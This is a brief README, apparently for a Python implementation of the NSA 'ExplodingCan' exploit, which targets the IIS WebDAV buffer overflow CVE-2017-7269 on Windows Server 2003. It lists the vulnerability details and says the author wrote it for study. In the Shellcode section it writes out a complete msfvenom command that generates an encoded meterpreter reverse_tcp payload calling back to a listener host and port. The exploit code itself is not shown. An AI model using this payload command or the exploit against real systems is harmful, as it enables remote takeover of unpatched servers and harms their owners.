An implementation of NSA's ExplodingCan exploit in Python

ExplodingCan

An implementation of ExplodingCan's exploit extracted from FuzzBunch, the "Metasploit" of the NSA.

Details

  • Vulnerability: Microsoft IIS WebDav 'ScStoragePathFromUrl' Remote Buffer Overflow
  • CVE: CVE-2017-7269
  • Disclosure date: March 31 2017
  • Affected product: Microsoft Windows Server 2003 R2 SP2 x86

Why?

Months ago I needed to study this exploit, and finally I implemented it in Python.

Shellcode

The shellcode must be in alphanumeric format due to the limitations of the bug. For example, we can use msfvenom (Metasploit) with the alpha_mixed encoder.

$ msfvenom -p windows/meterpreter/reverse_tcp -f raw -v sc -e x86/alpha_mixed LHOST=172.16.20.1 LPORT=4444 >shellcode

Links